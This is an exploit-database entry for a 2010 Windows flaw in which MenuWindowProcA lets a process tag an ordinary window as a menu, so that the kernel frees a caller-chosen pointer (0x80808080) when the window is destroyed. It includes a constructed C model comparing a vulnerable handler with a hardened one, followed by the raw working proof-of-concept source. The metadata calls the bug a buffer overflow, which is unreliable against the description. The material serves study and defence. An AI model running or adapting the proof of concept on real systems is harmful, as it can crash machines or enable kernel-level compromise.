Vendor: Windows
By: Mista
CVSS: 9.3 (HIGH)
Type: Buffer Overflow
CWE: 120 (Buffer Copy without Checking Size of Input)
Product Name: Windows
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
Year: 2010

Windows Class Handling Gone Wrong

This exploit is based on a vulnerability in the Windows class handling. The vulnerability is caused by a buffer overflow in the MenuWindowProcA function in the USER32.DLL library. The exploit stores the value 0x80808080 in the window's extra bytes as the pointer to the (soon to be) popup menu structure, then sets WND->fnid = FNID_MENU by sending WM_NCCREATE through MenuWindowProcA. When the window is destroyed, the kernel frees that caller-chosen pointer via ExPoolFree(0x80808080), which can lead to a denial of service or arbitrary code execution.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all input is properly validated and sanitized before being used.
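As an added illustration (not the PoC's code and not Microsoft's), the following constructed C model shows the tag confusion the description above relies on: a window object whose per-window extra bytes the owner may write, and a "menu" handler that, once the window carries the FNID_MENU tag, reinterprets those bytes as a pointer on the destroy path. It replays the PoC's sequence (write 0x80808080 into the extra bytes, send NCCREATE to the menu handler, destroy) against the vulnerable handler and against a hardened one. The hardened check (refuse to re-tag a window not created from the menu class) is an assumed, illustrative fix; it is not a claim about the vendor's actual change, and the struct and function names are invented for the model.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of the window/menu confusion; names are illustrative,
 * not win32k's, and the "fix" is an assumption made for this example. */
enum { FNID_NONE = 0, FNID_MENU = 0x1234 };
enum { CLASS_USER = 0, CLASS_SYSTEM_MENU = 1 };

typedef struct popup_menu { int refcount; } POPUPMENU;

typedef struct wnd {
    int class_id;                         /* class the window was registered from */
    int fnid;                             /* kind tag consulted on the destroy path */
    unsigned char extra[sizeof(void *)];  /* cbWndExtra bytes; SetWindowLongPtr writes here */
} WND;

/* Model of SetWindowLongPtr(hwnd, 0, value): the owner writes arbitrary bytes. */
static void set_window_longptr(WND *w, uintptr_t value) {
    memcpy(w->extra, &value, sizeof value);
}

/* The menu code reads the very same bytes back as a POPUPMENU pointer. */
static uintptr_t window_popup_ptr(const WND *w) {
    uintptr_t p;
    memcpy(&p, w->extra, sizeof p);
    return p;
}

/* Vulnerable WM_NCCREATE handling: tags any window, whatever class it came from. */
static int menu_nccreate_vulnerable(WND *w) {
    w->fnid = FNID_MENU;
    return 1;
}

/* Hardened handling (assumed fix, for illustration): only a window created
 * from the system menu class may be tagged, so extra bytes a caller controls
 * are never later trusted as a kernel pointer. */
static int menu_nccreate_hardened(WND *w) {
    if (w->class_id != CLASS_SYSTEM_MENU)
        return 0;
    w->fnid = FNID_MENU;
    return 1;
}

/* Destroy path. Instead of calling the pool free, returns the pointer value it
 * would have freed (0 when nothing is freed) so the outcome can be inspected. */
static uintptr_t destroy_window(WND *w) {
    if (w->fnid == FNID_MENU)
        return window_popup_ptr(w);
    return 0;
}

/* Replays the PoC's sequence against an ordinary user-class window and
 * returns the value that reaches the free. */
static uintptr_t replay_poc(int hardened) {
    WND w;
    memset(&w, 0, sizeof w);
    w.class_id = CLASS_USER;               /* plain class with cbWndExtra = sizeof(PVOID) */
    set_window_longptr(&w, (uintptr_t)0x80808080u);
    if (hardened)
        menu_nccreate_hardened(&w);
    else
        menu_nccreate_vulnerable(&w);
    return destroy_window(&w);
}

/* Control case: a window genuinely created from the menu class still works
 * under the hardened rule, and its real POPUPMENU is what reaches the free. */
static int legit_menu_window_ok(void) {
    WND w;
    POPUPMENU *pm = calloc(1, sizeof *pm);
    uintptr_t freed;
    memset(&w, 0, sizeof w);
    w.class_id = CLASS_SYSTEM_MENU;
    set_window_longptr(&w, (uintptr_t)pm);
    if (!menu_nccreate_hardened(&w)) {
        free(pm);
        return 0;
    }
    freed = destroy_window(&w);
    free(pm);
    return freed == (uintptr_t)pm;
}

int main(void) {
    printf("vulnerable handler: free(0x%lx)\n", (unsigned long)replay_poc(0));
    printf("hardened handler:   free(0x%lx)\n", (unsigned long)replay_poc(1));
    printf("legit menu window under hardened rule: %s\n",
           legit_menu_window_ok() ? "ok" : "broken");
    return 0;
}
```

The point the model makes is that the dangerous step is not the write into the extra bytes (the owner is allowed to write there) but letting the owner flip the object's kind tag afterwards; once the tag and the class disagree, every later consumer of the tag reads owner-controlled bytes as a trusted pointer.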
Source

Exploit-DB raw data:

#include <windows.h>

/*
Source:
http://mista.nu/blog/2010/12/01/windows-class-handling-gone-wrong/
*/

/* MenuWindowProcA is exported by USER32.DLL but not declared in the SDK
   headers; declare the five-argument signature the call below uses so the
   call is type-checked instead of going through an untyped FARPROC. */
typedef LRESULT (WINAPI *MENUWINDOWPROCA)(HWND hWnd, ULONG_PTR xParam, UINT Msg, WPARAM wParam, LPARAM lParam);

int main(int argc, char **argv)
{
	WNDCLASSA Class = {0};
	CREATESTRUCTA Cs = {0};
	MENUWINDOWPROCA MenuWindowProcA;
	HMODULE hModule;
	HWND hWindow;

	// register a plain class with one pointer-sized slot of per-window extra bytes
	Class.lpfnWndProc = DefWindowProc;
	Class.lpszClassName = "Class";
	Class.cbWndExtra = sizeof(PVOID);

	if (!RegisterClassA(&Class))
		return 1;

	hModule = LoadLibraryA("USER32.DLL");
	if (hModule == NULL)
		return 1;

	MenuWindowProcA = (MENUWINDOWPROCA)GetProcAddress(hModule,"MenuWindowProcA");
	if (MenuWindowProcA == NULL)
		return 1;

	hWindow = CreateWindowA("Class","Window",0,0,0,32,32,NULL,NULL,NULL,NULL);
	if (hWindow == NULL)
		return 1;

	// set the pointer value of the (soon to be) popup menu structure
	SetWindowLongPtr(hWindow,0,(LONG_PTR)0x80808080);

	// set WND->fnid = FNID_MENU
	MenuWindowProcA(hWindow,0,WM_NCCREATE,(WPARAM)0,(LPARAM)&Cs);

	// trigger -> ExPoolFree(0x80808080)
	DestroyWindow(hWindow);

	return 0;
}